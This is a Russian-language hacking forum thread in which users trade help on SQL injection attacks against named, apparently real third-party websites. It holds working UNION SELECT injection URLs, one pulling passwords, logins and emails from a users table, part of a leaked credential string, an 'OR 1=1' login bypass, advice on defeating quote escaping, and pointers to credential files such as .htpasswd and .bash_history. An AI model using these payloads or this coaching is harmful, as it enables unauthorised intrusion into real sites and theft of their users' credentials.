Кто может сказать,где лежат файлы .htpasswd,.htaccess и .bash_history ?И ещё: для чтения нужны права рута от бд или системы ? А также есть ещё одна вещь,которой я никак не пойму: Смысл делать имя сервера совападающее с алиасом (вида www5.site.com),если сам сайт - www.site.com.Непонятно...Дело в том,что по алиасу такого сайта по хттр протоколу не существует,а site.com есть.Пинги доходят до обоих(Один из них виртуальный хостинг,а другой хостящийся на нём сайт).Анадиз показал,что они находятся в одной подсети на разных машинах.Путь до логов на вирт. хостинге и на хостящемся на нём чсайте отличаются(вполне логично), но одни существуют,а другие - нет.Как такое объяснить ?
Велемир, .htpasswd и .htaccess могут лежать где угодно. Но чаще всего .htpasswd лежит или в корне или рядом с .htaccess, который, в свою очередь лежит, чаще всего, в папке, которая им защищена, или тоже в корне Права бд тут не при чем. А права системы нужны в зависимости от того какой уровень доступа поставил админ. Последний вопрос не понял о_О
ну htpasswd и htaccess лежать могут где угодно в корне сайта могут в самом корне, могут например в www.site.com/admin/, если например админка защищена щтацесом. Права на чтении будет всегда для пользователя от которого работает апач, однако прочитать их обычным запросом браузера типа www.site.com/.htaccess не получиться. Баш хистори обычно лежит в папке юзера, если например сайт в папке /home/someuser/httpdocs/ , то баш хистори в /home/someuser/.bash_history, прав на чтение как правило нет. Если я тебя правильно понял =()
Насчёт последнего,на виртуальном хосте путь до логов один,а на хостинге - другой.Лог файлов виртуального хоста есть,а системы,на которой хостится этот сайт - нету.Смотрел ErrorLog
Эм...При проверке на NULL взял поле,которое возвращает значение.is+null - не высвечивается ничего.is+not+null - высвечивается содержимое поля,тобишь,если не ноль, данные выводятся,а если ноль - нет?Или писаться NULL должно ? Просто результаты что с *якобы* пустым полем, и с полем со значением - одинаковые.
Велемир, я плохой телепат. Напиши полностью запросы которые ты проводишь и ответы на них. Извини, но пишешь ты непонятно)
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+where+user+is+not+null--&FID=17452 Не ноль - выводит данные. http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+where+user+is+null--&FID=17452 Ноль - не выводит).Так получается ?
Велемир Ты конечно величайший экспериментатор современности, но тебе самому не надоело , что 90% твоих постов просто никто не понимает, а 70% удаляют модераторы? Прочитай хоть одну книгу по интересующей тебя теме, и все твои вопросы отпадут. По поводу последнего поста вот онлайн справочник по базам данных: http://www.sql.ru/docs/ Умоляю тебя, прочитай хоть что-нибудь!!!
нашел вот такой сайт Code: http://www.elementar.de/cms/index.php?id=487&L=-1231314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95/* попробовал подставить version() в каждое из 95 полей , как вообще лучше искать то поле (если их например больше 50) куда подставлять нужный код?
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это: 1) http://dev.mysql.com/doc/ 2) https://forum.antichat.ru/thread19605.html 3) https://forum.antichat.ru/thread35207.html А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные?
есть сайт http://site.com/index.php на котором можно залогинится. я посылаю следующий POST запрос Code: login=admin'+OR+1=1&password=qwerty выдает следующую ошибку Code: [IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1' из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает... кто что может посоветовать ???
Скорее всего ты здесь ничего не сделаешь, т.к. судя по всему мейджик_квотс = он: Думаю что вначале кавычка экранировалась слешем (который ставился квотой), а затем сам скрипт экранировал повторно и кавычку и слеш (поставленный квотой), т.е. скорее всего даже если мейджик_квотс был равен = офф, ты бы здесь ничего не сделал. А вообще в таких случая нужно приписывать перед кавычкой слеш (в надежде что мейджик_квотс = офф и что скриптом слеш не будет экранирован), тогда получится что один слеш экранирует другой, а кавычка останется не экранированной ( \\' ).
привет. ребята, помогите мне пожалуйста вот с етим: http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login,email),5,6,7,8,9,10,11,12,13,14+from+users/* а дальше че-т не идет.. через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
ну на запрос к администраторской панели: http://alvis.ru/admin просит ввести имя и пароль.. если виполнить предодущий запрос (которий я написал), то ми увидем: shb09789:www:[email protected] если вводить ети дание, то админ_панель отказиваетса показиватса =)
Не совсем. Не факт, что таблица есть, натпись "command denied" вылезает так-же при неверном значении таблицы. http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+from+abracadabra/* Ну или там есть таблица "abracadabra", и к ней тоже закрыт доступ А кто сказал что они должны подойти?
